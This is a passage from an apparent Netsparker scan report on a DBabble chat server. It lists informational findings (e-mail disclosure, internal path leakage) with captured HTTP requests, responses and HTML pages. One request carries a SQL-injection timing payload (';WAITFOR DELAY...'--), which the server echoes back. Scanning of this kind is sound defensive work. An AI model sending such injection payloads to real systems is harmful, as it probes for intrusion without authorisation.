"messageWindow", "width="+window_width+",height="+window_height+",resizable=yes") document.loginform.target="messageWindow" document.loginform.after_logout_page.value="javascript:window.close()" } if (sub_frame_name!="") { if (after_logout_page=="") { document.loginform.after_logout_page.value="blank.htm"; } document.loginform.override_dot_top.value=".top."+sub_frame_name document.loginform.override_main_name.value=sub_frame_name document.loginform.override_check_main_window.value="window.length>1 && window.top.frames[1].name=='"+sub_frame_name+"'" } if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="0" document.loginform.after_login_page.value="cmd=u_talk&hid=511&"+txt+"="+uid+"&talk_first_message="+escape(initial_message)+"&talk_other_first_message="+escape(other_initial_message)+"&talk_request_style="+talk_request_style+"&title_message="+escape(title_message)+"&leave_message="+escape(leave_message)+"&pick_first="+group_pick_first+"&heading_message="+escape(heading_message)+"&alt_message="+escape(alt_message);; document.loginform.window_title.value=title_message; setTimeout("GuestLoginNow()",250);}function GuestLoginTalkDo(new_window,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message){ GuestLoginTalkDo2(new_window,290,190,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message,"","")}function GuestLoginTalk(new_window, is_ugroup, uid,hide_menu_and_friends,initial_message){ other_initial_message="Hi, -NAME- here. How can I help you?" talk_request_style=1 // 0 = Send request to recipient as soon as clicking on the link // 1 = Send request as soon as you start typing // 2 = Send request as soon as you have finished typing a complete line GuestLoginTalkDo(new_window,is_ugroup,0,uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message,'','','','')}// --></script><title>DBabble conexi�n</title></head><body onload="Startup()" BACKGROUND="/img/whttxtr2.jpg"><LINK REL = "stylesheet" TYPE = "text/css" HREF = "/dbabble?cmd_get_js2=dbabble.css"><script language="JavaScript" src="/dbabble?cmd_get_js2=dbabble.js"></script><table bgcolor="black" width=100% border=0><tr> <td width=100% bgcolor="#336699" valign=center align=center><table border=0 cellpadding=0 cellspacing=0 margin=0><tr><td><img src="/img/netwin.gif" alt="Tra�do a usted por el software de NetWin Server - http://netwinsite.com" border=0</img></td><td><font class="huge_font" color="white">DBabble</font></td><td>&nbsp;&nbsp;&nbsp;</td><td><STYLE TYPE="text/css"><!-- A:VISITED.href_encode_class {color:white;} A:LINK.href_encode_class {color:white;}--></STYLE><font color="white">Tra�do a usted por el software de NetWin Server - <a class='href_encode_class' target='notvchat' href='http://netwinsite.com'>http://netwinsite.com</a></font></td></tr></table></td></tr></table><table><table width="100%" cellpadding=0 cellspacing=1 border=0 bgcolor="black"><tr align=center><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="khaki"><font color="black">Lengua:</font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=English&template=Standard"><font color="white">English</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><font color="white"><b>Espa�ol(Spanish)</b></font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=Deutsch(German)&template=Standard"><font color="white">Deutsch(German)</font></a><spacer type="block" width=10px></td><td bgcolor="steelblue" width="100%">&nbsp;</td></tr></table><br></tr></table><table><tr><td><font color="orange" style="font-size:12pt;"><b>DBabble para Windows</b></font>- Usted debe descargar e instalar el cliente de DBabble Windows 95/98/ME/2000/2003/NT/XP m�s bien que usar este Web page si es posible. Es mucho m�s r�pido y m�s f�cil utilizar. Usted puede descargarlo libremente de aqu�. <a href="/files/DBabble27y_Espa�ol(Spanish).exe" style="font-size:12pt;">Transferencia directa Versi�n 2.7y de DBabble</a>(1,947,161 bytes - debe tomar sobre 5 minutos sobre un m�dem 56K)</td></tr></table><script language="JavaScript"><!--CheckVersion() CheckBrowserVersion()//--></script><NOSCRIPT><b> Advertencia - DBabble requiere un web browser que apoye el Javascript 1,1 o m�s alto.<br>Su web browser no apoya Javascript o usted lo ha inhabilitado en sus preferencias.</b></NOSCRIPT><form style="margin:0" name="loginform" method="POST" target="_top" action="/dbabble"onSubmit="return SubmitCheck()"><table width=100%><tr><th colspan=2 align=left bgcolor=ivory>Nombre Y Contrase�a Del Usuario De la Conexi�n</th><th colspan=2" align=left bgcolor=ivory width=100%>Opciones De la Conexi�n</th></tr><tr><td><table><tr><td nowrap> Nombre de usuario</td><td><input type="text" name="user" value="" size="20" onkeypress="return UserCheck(event)"></td></tr><tr><td nowrap> Contrase�a</td><td> <input type="password" name="pass" value="" size="20" onkeypress="return PassCheck(event)"></td></tr></table></td><td align="LEFT"><input align="LEFT" type="submit" class=spbutton onmouseover="MO(event)" onmouseout="MU(event)" value="Iniciar sesi�n" alt="Iniciar sesi�n" name="Iniciar sesi�n"></td><td><table><tr><td nowrap><input type=hidden name="is_save_password" value="true"><input type=radio name="save_name" value="name">Excepto Nombre</td></tr><tr><td nowrap><input type=radio name="save_name" value="pass">Excepto nombre y contrase�a</td></tr><tr><td nowrap><input type=radio name="save_name" checked value="neither">Ni unos ni otros</td></tr></table></td><td><table><tr><td>Para simplificar el interfaz usted puede ocultar opcionalmente algunas caracter�sticas</td></tr><tr><td>Caracter�sticas:<select name="show_features"><option value="0" selected>Demuestre Todas las Caracter�sticas</option><option value="1" >Mensajes Inmediatos Solamente</option><option value="2" >Grupos de discusi�n solamente</option><option value="3" >Salas de charla solamente</option><option value="4" >Cuartos y discusiones de la charla solamente</option><option value="5" >Cuartos de la charla y mensajes inmediatos solamente</option><option value="6" >Discusiones y mensajes inmediatos solamente</option></select></td></tr></table></td></tr></table><input type="hidden" name="r_login" value="Login"><input type="hidden" name="u_day" value=""><input type="hidden" name="u_hour" value=""><input type="hidden" name="u_min" value=""><input type="hidden" name="u_sec" value=""><input type="hidden" name="qfiller" value=""><input type="hidden" name="window_title" value=""><input type="hidden" name="change_lang" value="Espa�ol(Spanish)"><input type="hidden" name="change_template" value="Standard"><input type="hidden" name="after_login_page" value=""><input type="hidden" name="hide_menu_and_friends" value=""><input type="hidden" name="after_logout_page" value=""><input type="hidden" name="override_dot_top" value=""><input type=hidden name="override_main_name" value=""><input type=hidden name="override_check_main_window" value=""><input type=hidden name="new_window" value="0"></form><script language="JavaScript"><!--document.loginform.user.focus();// --></script>Conexi�n justa usando su nombre y contrase�a normales del usuario del email<br><table width=100%><tr><th align=left bgcolor=ivory>Conexi�n De la Hu�sped</th></tr><tr><td>Usted puede alternativomente conexi�n como hu�sped. Las caracter�sticas de alg�n DBabble no est�n disponibles como hu�sped.</td></tr><tr><td><a href="javascript:GuestLogin()">Conexi�n de la hu�sped</a></td></tr></table><table width=100%><tr><th align=left bgcolor=ivory>Otras Conexiones</th></tr></table><a target='helpwin' href="/help/Espa�ol(Spanish)/Standard/contents.htm">Ayuda En l�nea de DBabble</a><br><a target='helpwin' href="/help/Espa�ol(Spanish)/Standard/password.htm">�Se olvid� de su contrase�a?</a><br><br>En este servidor tenemos 17 los usuarios registradosy los usuarios de 2 est�n actualmente en l�nea.Hay 1 sitio de la charlay hay 1 grupo de discusi�ncontener un total de art�culos de 306.<br><br>Usted puede utilizar DBabble con seguridad pero un directo m�s lento su web browser en <a href="https://netwin.co.nz:8133">https://netwin.co.nz:8133</a><hr>DBabble Linux versi�n del servidor de 2.7z (Aug 25 2004)- Servidor disponible para 340 d�as desde Dom, May 16 2010 4:44 pm<hr><font class=small_font>Powered by Netwin's <a href="http://netwinsite.com/dbabble/index.htm">DBabble secure chat, instant messaging and discussion server</a> software<table cellpadding="1" cellspacing="4"> <tr> <td class=small_font><b><a href="http://www.netwinsite.com">Netwin -- Server Software</a></b></font></td> <td class=small_font><a href="http://netwinsite.com/dnews.htm">DNews -- UseNet News Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/surgemail/index.htm">SurgeMail -- Mail Server Software</a></td> </tr> <tr> <td class=small_font><a href="http://netwinsite.com/webmail/index.htm">WebMail -- Web Mail Client</a></td> <td class=small_font><a href="http://netwinsite.com/surgeftp/index.htm">SurgeFTP -- Ftp Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/dbabble/index.htm">DBabble -- Chat Server, Instant Messaging, Discussions / Forums</a></td> </tr></table></font></body></html>
E-mail Address Disclosure

E-mail Address Disclosure
1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /help/English/preferences.htm

/help/English/preferences.htm

http://smtp.netwin.co.nz:8132/help/English/preferences.htm

Found E-mails

someone@netwinsite.com

Request

GET /help/English/preferences.htm HTTP/1.1
Referer: http://smtp.netwin.co.nz:8132/help/English/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: smtp.netwin.co.nz:8132
Cookie: TEMPLATE=Standard; LANG=Deutsch(German)
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: DBabble 2.7z
Content-Length: 15622
Connection: close
MIME-version: 1.0
Date: Fri, 22 Apr 2011 00:22:28 GMT
Content-Type: text/html


<html><head><STYLE TYPE="text/css"><!-- BODY {font-size:10pt;} TD {font-size:10pt;} INPUT {font-size:9pt;} SELECT {font-size:8pt;} TEXTAREA {font-size:10pt;} TH {font-size:10pt;} FONT {font-size:10pt;}--></STYLE><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>DBabble Preferences</title></head><body BACKGROUND="/img/whttxtr2.jpg" onload="window.focus()"><table width="100%" cellpadding=0 cellspacing=1 border=0 bgcolor="black"><tr align=center><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="khaki"><font color="black">DBabble Help</font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="javascript:window.close()"><font color="white">Close Help</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="contents.htm"><font color="white">Help Contents</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="search.htm"><font color="white">Help Search</font></a><spacer type="block" width=10px></td><td bgcolor="steelblue" width="100%">&nbsp;</td></tr></table><font color="black"><h4>DBabble Preferences</h4></font><ol><li> <a href="#overview">Overview</a></li><li> <a href="#win">Preferences in Windows Client</a> <ol type="a"> <li> <a href="#pref_win_online_focus">Focus contacts frame/window when contacts come online</a> </li> <li> <a href="#pref_win_sent_attachments">Record copies of sent attachments</a> </li> <li> <a href="#pref_win_auto_del_read">Automatically delete copies of read messages</a> </li> <li> <a href="#pref_win_auto_del_sent">Automatically delete copies of sent messages</a> </li> <li> <a href="#pref_win_reply_below">Reply to messages below original text</a> </li> <li> <a href="#pref_win_delete_after_reply">Default to deleting original message after replying</a> </li> <li> <a href="#pref_win_delete_after_forward">Default to deleting original message after forwarding</a> </li> <li> <a href="#pref_win_lost_connections">Tell me when connection to server is lost</a> </li> <li> <a href="#pref_win_popup_windows">Popup Window or Flashing Icon</a> </li> <li> <a href="#pref_win_idle_on">Other users see you as idle</a> </li> <li> <a href="#pref_win_offline_idle_on">Other users see you as offline</a> </li> <li> <a href="#pref_win_forward_to_email">When offline, forward instant messages to email</a> </li> <li> <a href="#pref_win_accept_from_email">Accept email and turn into instant messages for me</a> </li> <li> <a href="#pref_win_check_email_1">Notification of new email</a> </li> <li> <a href="#pref_win_check_email_2">Notification of new email - Message matching rules</a> </li> </ol></li><li> <a href="#web">Preferences in Web Browser</a> <ol type="a"> <li> <a href="#pref_web_online_focus">Focus contacts frame/window when contacts come online</a> </li> <li> <a href="#pref_web_page_size">Number of old messages listed on each page</a> </li> <li> <a href="#pref_web_friends_window">Display Contacts List in a Separate Window</a> </li> <li> <a href="#pref_web_friends_frame">Display Contacts List in a Separate Frame</a> </li> <li> <a href="#pref_web_menu_at_top">Show menu at top of window</a> </li> <li> <a href="#pref_web_sent_attachments">Record copies of sent attachments</a> </li> <li> <a href="#pref_web_auto_del_read">Automatically delete copies of read messages</a> </li> <li> <a href="#pref_web_auto_del_sent">Automatically delete copies of sent messages</a> </li> <li> <a href="#pref_web_delete_after_reply">Default to deleting original message after replying</a> </li> <li> <a href="#pref_web_forward_to_email">When offline, forward instant messages to email</a> </li> <li> <a href="#pref_web_accept_from_email">Accept email and turn into instant messages for me</a> </li> <li> <a href="#pref_web_check_email_1">Notification of new email</a> </li> <li> <a href="#pref_web_check_email_2">Notification of new email - Message matching rules</a> </li> </ol></li></ol><ul><li> <a name="overview"><font color="green"><b>Overview</b></font></a><br>DBabble provides you with a list of options to customize DBabble to your personal preferences.The options available are different depending on whether you are using a web browser or the Windows client.<p></li><li><a name="win"><font color="green"><b>Preferences in Windows Client</b></font></a><br>You can access the preferences window by selecting <b>DBabble Preferences</b> from the <b>Edit</b> Menu.<ol type="a"><br> <li> <a name="pref_win_online_focus"><font color="green">Focus contacts frame/window when contacts come online</font></a><br> If this option in on, and you have either the contacts frame or window option on, then whenever a contact comes online the contacts frame or window is focussed. </li> <li> <a name="pref_win_sent_attachments"><font color="green">Record copies of sent attachments</font></a><br> Whenever you send an instant message with a file attached to it, normally a copy of the sent attachment is not recorded. If this option is checked, then a copy will be stored. </li> <li> <a name="pref_win_auto_del_read"><font color="green">Automatically delete copies of read messages</font></a><br> If this option is checked, then copies of messages you have read but not deleted are automatically deleted after the given number of days. </li> <li> <a name="pref_win_auto_del_sent"><font color="green">Automatically delete copies of sent messages</font></a><br> If this option is checked, then copies of messages you have sent but not deleted are automatically deleted after the given number of days. </li> <li> <a name="pref_win_reply_below"><font color="green">Reply to messages below original text</font></a><br> If this option is checked, then whenever you reply to a message, it is quoted and the cursor appears below the quoted text. If this is not checked, the cursor appears above the quoted text. </li> <li> <a name="pref_win_delete_after_reply"><font color="green">Default to deleting original message after replying</font></a><br> Whenever you reply to an instant message sent to you, there is a checkbox available to delete the original message after you have replied to it. If this preference is on, then that checkbox will be checked by default. You can have this preference on, and still uncheck individual messages if you would rather keep them. </li> <li> <a name="pref_win_delete_after_forward"><font color="green">Default to deleting original message after forwarding</font></a><br> This option is the same as the delete after replying option, but instead applies to forwarded messages. </li> <li> <a name="pref_win_lost_connections"><font color="green">Tell me when connection to server is lost</font></a><br> Occasionally, DBabble may loose your connection to the server if something goes wrong such as your internet connection going down, or the DBabble server temporarily stops. If this option is enabled in your preferences, you will be told when the connection to the server has been lost, and be given the option of trying to reconnect or not. If this option is not enabled, then if the connection is lost, DBabble will not tell you (although it will show up as not connected in the system tray) and will quietly try to reconnect to the server again as soon as it can. </li> <li> <a name="pref_win_popup_windows"><font color="green">Popup Window or Flashing Icon</font></a><br> DBabble provides you with the option of how you want to be notified when you receive new messages. By default, when you receive a new message or talk request, then the DBabble icon next to the system clock will flash until you click on it. You can instead make messages pop up instantly in on the screen if you would prefer. </li> <li> <a name="pref_win_idle_on"><font color="green">Other users see you as idle</font></a><br> If this option in on, then other users will see you as being idle if you have not typed or moved the mouse recently in any application on your computer. </li> <li> <a name="pref_win_offline_idle_on"><font color="green">Other users see you as offline</font></a><br> If this option in on, then other users will see you as being offline if you have not typed or moved the mouse recently in any application on your computer. </li> <li> <a name="pref_win_forward_to_email"><font color="green">When offline, forward instant messages to email</font></a><br> If this option is on, any instant messages you receive while you are offline will be forwarded to the specified email address. </li> <li> <a name="pref_win_accept_from_email"><font color="green">Accept email and turn into instant messages for me</font></a><br> If this option is on, anyone can send to your special DBabble email address, and these messages get converted into instant messages for you. </li> <li> <a name="pref_win_check_email_1"><font color="green">Notification of new email</font></a><br> This preference section allows you to specify one or more email servers so that you will be automatically informed when you have new email. </li> <li> <a name="pref_win_check_email_2"><font color="green">Notification of new email - Message matching rules</font></a><br> This lets you specify that you only want to be informed of new email matching a given set of rules. For example you might only want to know when you have new email from a particular email address.<br> Specify one or more rules of the form <b>(Header Name): (Match Text)</b>. For example <b>From: @netwinsite.com</b> would match any email where the from address is someone@netwinsite.com. Another example is <b>not (X-Spam-Detect: *)</b> which would not notify you of email that contains the header X-Spam-Detect which is a header added by some email servers when they think the message they are giving to you is probably spam.<br>Rules can be combined using <b>and</b> and <b>or</b>. For example: <b>(From: @netwinsite.com) or ((Priority: high) and not (X-Spam-Detect: *))</b> would match email either from someone@netwinsite.com or any other high priority mail, as long as it is not spam. </li></ol><p></li><li><a name="web"><font color="green"><b>Preferences in Web Browser</b></font></a><br>You can access the preferences window by selecting the <b>Preferences</b> link from the list of links at the top of the main window.<br><ol type="a"> <li> <a name="pref_web_online_focus"><font color="green">Focus contacts frame/window when contacts come online</font></a><br> If this option in on, and you have either the contacts frame or window option on, then whenever a contact comes online the contacts frame or window is focussed. </li> <li> <a name="pref_web_page_size"><font color="green">Number of old messages listed on each page</font></a><br> When viewing a list of old instant messages you have received or sent, this many messages will be listed on each page. </li> <li> <a name="pref_web_friends_window"><font color="green">Display Contacts List in a Separate Window</font></a><br> If this option is checked, then your list of contacts will appear in a separate window. You must logout and login again before any changes to this setting take effect. </li> <li> <a name="pref_web_friends_frame"><font color="green">Display Contacts List in a Separate Frame</font></a><br> If this option is checked, then your list of contacts is shown in a frame on the right hand side of the window. You must logout and login again before any changes to this setting take effect. </li> <li> <a name="pref_web_menu_at_top"><font color="green">Show menu at top of window</font></a><br> If this option is checked, then the list of standard links is displayed at the top of the window instead of on the left. You must logout and login again before changes to this setting take effect. </li> <li> <a name="pref_web_sent_attachments"><font color="green">Record copies of sent attachments</font></a><br> Whenever you send an instant message with a file attached to it, normally a copy of the sent attachment is not recorded. If this option is checked, then a copy will be stored. </li> <li> <a name="pref_web_auto_del_read"><font color="green">Automatically delete copies of read messages</font></a><br> If this option is checked, then copies of messages you have read but not deleted are automatically deleted after the given number of days. </li> <li> <a name="pref_web_auto_del_sent"><font color="green">Automatically delete copies of sent messages</font></a><br> If this option is checked, then copies of messages you have sent but not deleted are automatically deleted after the given number of days. </li> <li> <a name="pref_web_delete_after_reply"><font color="green">Default to deleting original message after replying</font></a><br> Whenever you reply to an instant message sent to you, there is a checkbox available to delete the original message after you have replied to it. If this preference is on, then that checkbox will be checked by default. You can have this preference on, and still uncheck individual messages if you would rather keep them. </li> <li> <a name="pref_web_forward_to_email"><font color="green">When offline, forward instant messages to email</font></a><br> If this option is on, any instant messages you receive while you are offline will be forwarded to the specified email address. </li> <li> <a name="pref_web_accept_from_email"><font color="green">Accept email and turn into instant messages for me</font></a><br> If this option is on, anyone can send to your special DBabble email address, and these messages get converted into instant messages for you. </li> <li> <a name="pref_web_check_email_1"><font color="green">Notification of new email</font></a><br> This preference section allows you to specify one or more email servers so that you will be automatically informed when you have new email. </li> <li> <a name="pref_web_check_email_2"><font color="green">Notification of new email - Message matching rules</font></a><br> This lets you specify that you only want to be informed of new email matching a given set of rules. For example you might only want to know when you have new email from a particular email address.<br> Specify one or more rules of the form <b>(Header Name): (Match Text)</b>. For example <b>From: @netwinsite.com</b> would match any email where the from address is someone@netwinsite.com. Another example is <b>not (X-Spam-Detect: *)</b> which would not notify you of email that contains the header X-Spam-Detect which is a header added by some email servers when they think the message they are giving to you is probably spam.<br>Rules can be combined using <b>and</b> and <b>or</b>. For example: <b>(From: @netwinsite.com) or ((Priority: high) and not (X-Spam-Detect: *))</b> would match email either from someone@netwinsite.com or any other high priority mail, as long as it is not spam. </li></ol><p></li></ul></body></html>
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)
1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /dbabble

/dbabble

http://smtp.netwin.co.nz:8132/dbabble?cmd_get_js2=%27;WAITFOR%20DELAY%20%270:0:25%27--

Identified Internal Path(s)

/usr/local/dbabble/tpl/

Request

GET /dbabble?cmd_get_js2=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: http://smtp.netwin.co.nz:8132/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: smtp.netwin.co.nz:8132
Cookie: TEMPLATE=Standard; LANG=English
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: DBabble 2.7z
Content-Length: 95
Connection: close
MIME-version: 1.0
Date: Fri, 22 Apr 2011 00:22:45 GMT
Cache-control: max-age=3600, must-revalidate
Content-Type: text/html


Unable to read (';WAITFOR DELAY '0:0:25'--) (/usr/local/dbabble/tpl/';WAITFOR DELAY '0:0:25'--)
[Possible] Internal Path Leakage (Windows)

[Possible] Internal Path Leakage (Windows)
2 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.

External References

- /help/English/changes.htm

/help/English/changes.htm

http://smtp.netwin.co.nz:8132/help/English/changes.htm

Identified Internal Path(s)

c:\test

Request

GET /help/English/changes.htm HTTP/1.1
Referer: http://smtp.netwin.co.nz:8132/help/English/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: smtp.netwin.co.nz:8132
Cookie: TEMPLATE=Standard; LANG=Deutsch(German)
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: DBabble 2.7z
Content-Length: 49100
Connection: close
MIME-version: 1.0
Date: Fri, 22 Apr 2011 00:22:28 GMT
Content-Type: text/html


<html><head><STYLE TYPE="text/css"><!-- BODY {font-size:10pt;} TD {font-size:10pt;} INPUT {font-size:9pt;} SELECT {font-size:8pt;} TEXTAREA {font-size:10pt;} TH {font-size:10pt;} FONT {font-size:10pt;}--></STYLE><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>DBabble Windows Client Changes</title></head><body BACKGROUND="/img/whttxtr2.jpg" onload="window.focus()"><table width="100%" cellpadding=0 cellspacing=1 border=0 bgcolor="black"><tr align=center><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="khaki"><font color="black">DBabble Help</font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="javascript:window.close()"><font color="white">Close Help</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="contents.htm"><font color="white">Help Contents</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="search.htm"><font color="white">Help Search</font></a><spacer type="block" width=10px></td><td bgcolor="steelblue" width="100%">&nbsp;</td></tr></table><font color="black"><h4>DBabble Windows Client Changes</h4></font>Below is a list of new features and problems fixed in recent versions of the DBabble Windows client.To upgrade from an older version of the Windows client, right click on the icon in the system tray (by the clock) and choose the upgrade option.You will be automatically notified when new versions are available if you have the "Tell me when upgrades are available" option on in your preferences.<hr> <font color="green"><b>Version 2.7w (Tue, Aug 17 2004)</b></font><br><br> <font color="green">New features in version 2.7w</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.7w</font> <ul> <li> Fixed a memory leak bug that could occasionally happen when connected to ICQ, MSN, etc gateway servers. In rare situations this could cause DBabble to hang (stop working). </li> </ul><hr> <font color="green"><b>Version 2.7u (Tue, Aug 10 2004)</b></font><br><br> <font color="green">New features in version 2.7u</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.7u</font> <ul> <li> Fixed bug in 2.7s where a web page embedded at the top of a chat room window did not work. </li> </ul><hr> <font color="green"><b>Version 2.7s (Wed, Aug 4 2004)</b></font><br><br> <font color="green">New features in version 2.7s</font> <ul> <li> Added option (default on) so that the button image is highlighted when the mouse is hovering over it. </li> </ul> <font color="green">Problems fixed in version 2.7s</font> <ul> <li> Fixed bug where choosing to save all attachments to a folder that does not exist saves them into the default 'documents and settings' folder. </li> <li> Fixed printing bug where tab characters were not being correctly printed. </li> <li> Fixed bug where the login window could remain visible but disabled after you logged in in some situations. </li> <li> Fixed bug where the send button in the online support chat window had a blank caption. </li> <li> Fixed bug where changing your user details in your preferences would sometimes leave ugly gray boxes in the window. </li> </ul><hr> <font color="green"><b>Version 2.7q (Wed, Jul 14 2004)</b></font><br><br> <font color="green">New features in version 2.7q</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.7q</font> <ul> <li> Fixed rare crash bug caused when creating a reminder for a deleted message. </li> </ul><hr> <font color="green"><b>Version 2.7h (Thu, May 20 2004)</b></font><br><br> <font color="green">New features in version 2.7h</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.7h</font> <ul> <li> Fixed a few minor bugs </li> </ul><hr> <font color="green"><b>Version 2.7e (Tue, May 11 2004)</b></font><br><br> <font color="green">New features in version 2.7e</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.7e</font> <ul> <li> Fixed a few minor bugs </li> </ul><hr> <font color="green"><b>Version 2.6k (Mon, Feb 9 2004)</b></font><br><br> <font color="green">New features in version 2.6k</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.6k</font> <ul> <li> Fixed minor bug in 2.6h - pressing a button and moving mouse away before releasing button would click the button when it shouldn't have. </li> <li> If your machine supports 256 colors or less, then the background image preferences defaults to off due to it not looking good and causing performance problems. </li> <li> Fixed problem where replying to a sent message or a message to multiple recipients would refer to the user by their user-id instead of user-name for encryption certificate purposes. </li> </ul><hr> <font color="green"><b>Version 2.6h (Wed, Jan 14 2004)</b></font><br><br> <font color="green">New features in version 2.6h</font> <ul> <li> When sending a message to a gateway user who is on your contacts list, it now displays their online status at the top of the window. </li> <li> Added immediate reconnect preference so that if your connection to the server is lost it will try to reconnect immediately. Useful if your ISP does not allow connections to remain open for more than a few minutes. </li> </ul> <font color="green">Problems fixed in version 2.6h</font> <ul> <li> Fixed problem with MSN communication showing your name as "(NULL)" to other users in some situations. If you are already using MSN through DBabble then in the preferences window, you may need to delete your MSN name/password in DBabble, click apply, then enter them again to make this fix take effect. </li> <li> Fixed problem with the 'start in chat mode with gateway users' preference not always working. </li> <li> Fixed bug where instant message headers could continuously flicker in very rare situations. </li> <li> Fixed problem where some animated gif images would not display correctly. </li> <li> Fixed bug that could crash DBabble in rare situations when upgrading to a new version. If this happens while upgrading you should shut down your existing version and download the new version from your DBabble server web page (e.g. http://domain.name.com:8132 where you replace domain.name.com with your DBabble server domain name) and install that over the top of your old version. Your existing preferences and settings will be maintained. </li> </ul><hr> <font color="green"><b>Version 2.6e (Wed, Nov 19 2003)</b></font><br><br> <font color="green">New features in version 2.6e</font> <ul> <li> Added support for connecting to the server through a proxy server using SSL (encrypted communication). </li> <li> Added forum and chat room option to automatically open the window on startup. </li> <li> Added option to dock chat room windows to the main window and a preference to automatically dock newly open chat room windows. </li> <li> Added option to only display contacts and subscribed discussions in old instant message user list. </li> </ul> <font color="green">Problems fixed in version 2.6e</font> <ul> <li> Fixed warning display about message not being signed for instant message copies of articles posted to forums. </li> </ul><hr> <font color="green"><b>Version 2.5r (Wed, Oct 22 2003)</b></font><br><br> <font color="green">New features in version 2.5r</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.5r</font> <ul> <li> Fixed minor bugs and improved performance for some features. </li> </ul><hr> <font color="green"><b>Version 2.5q (Tue, Oct 7 2003)</b></font><br><br> <font color="green">New features in version 2.5q</font> <ul> <li> Added chat room option to not be notified when users enter the chat room while the window is not focussed </li> <li> Added 'Start in chat mode with user groups' preference. </li> </ul> <font color="green">Problems fixed in version 2.5q</font> <ul> <li> Fixed chat room bug where it would scroll down on every refresh when connecting through a proxy server </li> <li> Upgraded to OpenSSL 0.9.7c to fix encrypted communication security bugs. </li> </ul><hr> <font color="green"><b>Version 2.5i (Mon, Sep 1 2003)</b></font><br><br> <font color="green">New features in version 2.5i</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.5i</font> <ul> <li> Fixed problem where program could crash in rare situations when upgrading to a new version </li> <li> Fixed bug (in versions 2.5c and later) where typing the letters r, k, or w in the forum search box would not work due to those characters being treated as hot keys. </li> <li> Fixed bug that could cause received attachments to be saved to disk as empty files. </li> </ul><hr> <font color="green"><b>Version 2.5f (Tue, Aug 26 2003)</b></font><br><br> <font color="green">New features in version 2.5f</font> <ul> <li> Added status options in the system tray right click menu to set your state to idle/offline until you move the mouse. </li> <li> Added status options for whether you are available for online support (only applies if the server administrator allows guest users on your server) </li> <li> Added option to not notify you about partial typing in private conversation windows. </li> </ul> <font color="green">Problems fixed in version 2.5f</font> <ul> <li> Fixed bug that happened if you tried to send an instant message larger than 20K in size. It would ask you if you wanted to send it as an attachment instead, but if you choose yes it would not work. </li> <li> Fixed bug where sending a digitally signed instant message with an attachment to an email address would include the attachment signature as part of the attachment data in the email. </li> </ul><hr> <font color="green"><b>Version 2.5e (Mon, Aug 11 2003)</b></font><br><br> <font color="green">New features in version 2.5e</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.5e</font> <ul> <li> When you save an encrypted instant message to disk it now decrypts the message before saving it. </li> <li> 